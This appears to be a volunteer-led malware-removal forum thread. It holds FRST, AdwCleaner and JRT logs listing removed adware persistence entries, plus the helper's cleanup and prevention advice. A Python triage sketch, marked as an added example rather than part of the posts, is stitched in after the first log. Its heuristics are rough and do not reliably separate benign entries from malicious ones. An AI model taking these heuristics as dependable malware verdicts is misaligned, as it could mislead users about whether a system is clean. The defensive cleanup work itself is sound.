HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**10548e12<*> => value removed successfully
Firefox "homepage" removed successfully
Firefox "newtab" removed successfully
C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\[email protected] => path removed successfully
NetTcpHandler => service removed successfully
"C:\Users\PimpSlap\AppData\Roaming\NetService" => not found.
"HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{31718128-098F-4BB9-BAE0-DE20FCC657AB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{31718128-098F-4BB9-BAE0-DE20FCC657AB}" => key removed successfully
C:\WINDOWS\System32\Tasks\Installer_smknnodesk => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Installer_smknnodesk" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A91E6011-C8AE-4509-9EE9-6DB4B2051670}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A91E6011-C8AE-4509-9EE9-6DB4B2051670}" => key removed successfully
C:\WINDOWS\System32\Tasks\Installer_DSKB => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Installer_DSKB" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D42682DB-910D-46BF-950F-584A6578B3A2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D42682DB-910D-46BF-950F-584A6578B3A2}" => key removed successfully
C:\WINDOWS\System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D" => key removed successfully
C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => moved successfully
EmptyTemp: => 3.8 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 19:43:55 ====
 
 
I will get back to you with the results of the AdW scan. I won't be able to contact you until around 3 PM (Pacific) tomorrow. Thank you for your help so far :)

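
The Fixlog above removes several autostart entries: a service, scheduled tasks, a COM class registration and Run values. The following Python sketch is an added example, not part of the original posts and not FRST's own logic; it parses a few lines copied from that log and records why each entry stands out. The regular expressions, the reason labels and the reading of `[X]` as "target file missing" are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Sample input: lines copied from the Fixlog quoted in the post above.
FIXLOG_SAMPLE = r"""
S2 NetTcpHandler; C:\Users\PimpSlap\AppData\Roaming\NetService\netservice.exe -start [X]
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}\InprocServer32 -> no filepath
Task: {31718128-098F-4BB9-BAE0-DE20FCC657AB} - System32\Tasks\Installer_smknnodesk => C:\Users\PimpSlap\AppData\Local\Installer\Installsmknnodesk_32556\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {D42682DB-910D-46BF-950F-584A6578B3A2} - System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**bfa63c00<*> => value removed successfully
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\WindApp => value removed successfully
"""

ATTENTION = "<==== ATTENTION"  # marker that appears in the log itself

# One pattern per autostart mechanism seen in the log (hypothetical regexes).
PATTERNS = [
    ("task", re.compile(r"^Task: .*\\(?P<name>[^\\]+?) => (?P<target>.+)$")),
    ("service", re.compile(r"^[RSU]\d (?P<name>[^;]+); (?P<target>.+)$")),
    ("com-class", re.compile(
        r"^CustomCLSID: .*\\CLSID\\(?P<name>\{[0-9A-Fa-f-]+\})\\\S+ -> (?P<target>.+)$")),
    ("run-value", re.compile(
        r"^HK\w+\\.*\\CurrentVersion\\Run\\\\(?P<name>.+?) => ")),
]

# A target under a user's AppData can be written without administrator rights.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
# Value names made only of letters, digits, spaces and a little punctuation.
PLAIN_NAME = re.compile(r"^[\w .()\-]+$")


@dataclass
class Finding:
    kind: str      # task, service, com-class or run-value
    name: str      # task/service/value name or CLSID
    target: str    # command line with log markers stripped ("" if none logged)
    reasons: list  # why the entry deserves a closer look


def triage(text):
    """Return one Finding per recognised autostart entry in a Fixlog excerpt."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        for kind, pattern in PATTERNS:
            match = pattern.match(line)
            if match is None:
                continue
            name = match.group("name")
            raw = match.groupdict().get("target") or ""
            target = raw.replace(ATTENTION, "").replace("[X]", "").strip()
            reasons = []
            if USER_WRITABLE.search(target):
                reasons.append("runs from user-writable AppData")
            if ATTENTION in raw:
                reasons.append("flagged by scanner")
            # Assumption: "[X]" and "no filepath" both mean nothing is on disk.
            if raw.endswith("[X]") or raw == "no filepath":
                reasons.append("target missing")
            if kind == "run-value" and not PLAIN_NAME.match(name):
                reasons.append("unusual value name")
            findings.append(Finding(kind, name, target, reasons))
            break
    return findings


if __name__ == "__main__":
    for f in triage(FIXLOG_SAMPLE):
        print(f"{f.kind:10} {f.name}: {', '.join(f.reasons) or 'no heuristic hit'}")
```

An entry with no reasons, such as the WindApp Run value, is not thereby benign; the heuristics only rank what to look at first.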

#7
jake1master


Actually, that scan completed a lot faster than I thought! I will have to restart after I clean, but I will get that log to you after the restart.



#8
BrianDrab


Excellent and then let me know how your machine is functioning.



#9
jake1master

# AdwCleaner v5.024 - Logfile created 10/12/2015 at 20:03:22
# Updated 07/12/2015 by Xplode
# Database : 2015-12-07.3 [Server]
# Operating system : Windows 10 Pro  (x64)
# Username : PimpSlap - PIMPSLAP-PC
# Running from : C:\Users\PimpSlap\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[-] Service Deleted : swdumon
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Program Files (x86)\Probit Software
[-] Folder Deleted : C:\Program Files (x86)\Itibiti Soft Phone
[-] Folder Deleted : C:\ProgramData\ParetoLogic
[-] Folder Deleted : C:\ProgramData\{0b5148ad-4b38-a96b-0b51-148ad4b322b5}
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\slimware utilities inc
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\Nosibay
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\ParetoLogic
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\Store
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\TWV
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\RunDir
 
***** [ Files ] *****
 
[-] File Deleted : C:\END
[-] File Deleted : C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\yahoo.xml
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.boostrap.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.installation.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Selection Tools.installation.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\WindApp.boostrap.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\WindApp.installation.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\invalidprefs.js
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\bingp.xml
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\smod.xml
[-] File Deleted : C:\WINDOWS\SysNative\drivers\swdumon.sys
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
[-] Task Deleted : paretologic registration3
[-] Task Deleted : paretologic update version3
[-] Task Deleted : ParetoLogic Update Version3_triggeronce
 
***** [ Registry ] *****
 
[-] Key Deleted : HKLM\SOFTWARE\Classes\uus3url-pl
[-] Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\NetTcpHandler
[-] Key Deleted : HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
[-] Key Deleted : HKCU\Software\Nosibay
[-] Key Deleted : HKCU\Software\ParetoLogic
[-] Key Deleted : HKCU\Software\Store
[-] Key Deleted : HKCU\Software\WTools
[-] Key Deleted : HKCU\Software\Probit Software
[-] Key Deleted : HKCU\Software\SlimWare Utilities Inc
[-] Key Deleted : HKCU\Software\__SP__browser_name__SP__
[-] Key Deleted : HKLM\SOFTWARE\ParetoLogic
[-] Key Deleted : HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key Deleted : HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key Deleted : HKLM\SOFTWARE\NetTcpHandler
[-] Key Deleted : HKLM\SOFTWARE\NtSvcHandler
[-] Key Deleted : HKLM\SOFTWARE\EasyDriverPro
[-] Key Deleted : [x64] HKLM\SOFTWARE\BrowserAir
[-] Key Deleted : [x64] HKLM\SOFTWARE\SmartPCFixer
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
 
***** [ Web browsers ] *****
 
[-] [C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : fcfenmboojpjinhpgggodefccipikbpd
[-] [C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : jlcgehabolcakkjhgmgpkagpolbjlhfa
[-] [C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Homepage] Deleted : hxxp://www-searching.com/?pid=s&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f&vp=ch&prd=set
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [17431 bytes] ##########


#10
jake1master


Great! Everything seems to be running smoothly. Anything else that you see that needs to be removed?




#11
BrianDrab


A couple things to address. Please do the following.

 

Step#1 - JRT by Malwarebytes
1. Download Junkware Removal Tool to your desktop.
2. Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8, instead of double-clicking, right-click JRT.exe and select "Run as Administrator".
3. The tool will open. Press any key at the Disclaimer screen and the program will start scanning your system.
4. Please be patient as this can take a while to complete depending on your system's specifications.
5. On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
6. Close the text file and reboot your machine.
7. Post the contents of JRT.txt into your next message.

 

Step#2 -  Keeping Java Updated
WARNING: Java is one of the most exploited programs at this time. The Department of Homeland Security recommends that computer users disable Java. You can read more about this here.
I would recommend that you completely uninstall Java unless you need it to run important software. If you need it or are unsure or uncomfortable with removing it then I would recommend that you disable Java in your browsers until you need it and then enable it at that time. (See How to disable Java in your web browser and How to unplug Java from the browser). If you don't uninstall it, it's also important that you follow the directions below to update to the latest version of Java.
 
Note: If you don't use Java or don't know if you need it I would uninstall it.
 
If you wish to keep it please follow the instructions below to update to the newest version.
1. Click the Start button
2. Type Java
3. Click on Configure Java in the search results
4. Click the Update tab
5. Click the Update Now button and allow the update to download/install.

 



#12
jake1master

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.1 (11.24.2015)
Operating System: Windows 10 Pro x64 
Ran by PimpSlap (Administrator) on Fri 12/11/2015 at 15:06:37.93
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 5 
 
Successfully deleted: C:\Users\PimpSlap\AppData\Local\crashrpt (Folder) 
Successfully deleted: C:\Users\PimpSlap\AppData\Local\installer (Folder) 
Successfully deleted: C:\Users\PimpSlap\Documents\propccleaner (Folder) 
Successfully deleted: C:\WINDOWS\system32\Tasks\RegCure Pro Startup (Task)
Successfully deleted: C:\WINDOWS\Tasks\RegCure Pro Startup.job (Task) 
 
 
 
Registry: 2 
 
Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_F884F1D7BC4601607AB3C7CEE5F5A322 (Registry Value) 
Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\Main\\SearchAssistant (Registry Value) 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 12/11/2015 at 15:11:43.38
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


#13
BrianDrab


Perfect. Before we clean up our tools, can you provide me one more file? Please follow the instructions below.

 

Retrieve NTUser.dat from FRST Original Restore Point

1. Download ShadowExplorer and save to your desktop.

2. On your desktop there will be a file named ShadowExplorer-0.9-portable.zip. Right-click on this file and choose Extract All...

3. Ensure "Show extracted files when complete" is checked and click the Extract button.

4. A folder will open and you will see another folder named ShadowExplorerPortable-0.9

5. Double-click to open this folder and you will see up to four files. One of them is named ShadowExplorerPortable.exe.

6. Double-click this executable to open the program. Answer Yes to the UAC prompt if it comes up.

7. Please ensure that you pick your C: drive from the 1st drop-down and then pick the appropriate date/time from the 2nd drop-down. You are looking for one that will be 12/10/2015 at around 7:30PM.


 

8. Then expand the C:\ drive by clicking the plus sign next to it. Scroll down to find the Users folder and expand this.

9. Then directly click on the PimpSlap folder (no need to expand it).

10. Locate the file named NTUSER.DAT and right-click on this file. Select Export...


 

11. Select Desktop and click OK.

12. You may close ShadowExplorer now.

13. On your desktop, you will now have a file named NTUSER.DAT. Can you zip this and upload to SendSpace and provide the link?

 

Note: If you are not currently showing system files you will not see NTUSER.DAT on your desktop. It is there, just hidden. You can either uncheck "Hide protected operating system files (Recommended)" from Folder Options if you know how or simply do the following.

 

Right-click your Start button and choose Run. In the Run dialog, please copy/paste the following into the Open text box and click OK. You will then see the NTUSER.DAT file.

attrib -s -h %userprofile%\desktop\ntuser.dat

 



#14
jake1master


I clicked C: under the first drop down and there are no files or dates listed. There are files and dates for both the J: and the F: drives though. What should I do?



#15
BrianDrab


OK, no worries. It wasn't critical. As you are clean I will leave you with the following.

 

OK! Well done, your computer is clean again! :thumbsup: Part of our jobs here is to help you clean your computer. But beyond that and just as important is to provide you with some information to keep you safe and secure on the net as well as to share knowledge. Following is that information.
 
1. Clean Up!
We need to remove all the tools that we used so that should you ever be re-infected, you will download updated versions which may have updated detection logic.
1. Download Delfix from here.
2. Ensure everything is checked.
3. Click Run.
Note: The program will run for a few moments and then notepad will open with a log. Please paste the log in your next reply.
Note: Delete any other .bat, .log, .reg, .txt, and any other files created during this process and left on the desktop, and empty the Recycle Bin.
 
 
2. Keeping Programs Updated
You need to ensure that any programs installed on your machine are kept current. The bad guys exploit vulnerabilities that are found in older versions of software. A very good piece of software that keeps your programs up-to-date is Secunia Personal Software Inspector (PSI). You can download and install it from here. You can read more information about this free software as well as a video walkthrough from here.
 
3. Antimalware - Preventative
Note: Malwarebytes is a fantastic piece of software. Malwarebytes is an anti-malware software and not an antivirus software so it won't conflict with the Antivirus that you are running. I would recommend that you open up this program, allow it to update and scan your machine at least quarterly...monthly if you can.
 
4. Crypto Warning!!!! - Complete Data Loss can occur!
There are particularly nasty infections out there at the moment that encrypt your data and hold it for ransom. You may read more about this here.
 


  • Download CryptoPrevent free for home use here following the instructions below.
  • Save the file to your desktop from the link above and then open the program by clicking Run when prompted from your browser or by going to the desktop where the file was saved and double-clicking.
  • Accept all the defaults during the install. The last screen of the install has a checkmark in "Launch CryptoPrevent". This is good and will launch the program once you click Finish.
  • You will get a prompt asking if you purchased a Product Key for Automatic Updates. You can answer No.
  • You will then be prompted to learn more about automatic updates or if you want to purchase a key. This is up to you but you don't have to.
  • You will be prompted to click OK to continue and select your protection level. Go ahead and click OK.
  • Click the Apply button to set Default protection.
  • You may get a message stating that Windows Sidebar and Desktop Gadgets are a major security vulnerability and asking you if you want to disable them. If you don't use these features, answer Yes.
  • That's it. The protection is in place.

Note: The free version doesn't provide automatic updates. Periodically, you should open up the program (there is a shortcut on your desktop now) and select the Updates! menu....and select Check for Updates to see if there are any as this infection has serious consequences.
 
 

 

 
For more information about computer security and how to protect yourself when on the internet, please read this guide Best Practices for Safe Computing
 
OK, all the best, and stay safe!
 
Items for your next post
1. Contents of the delfix log







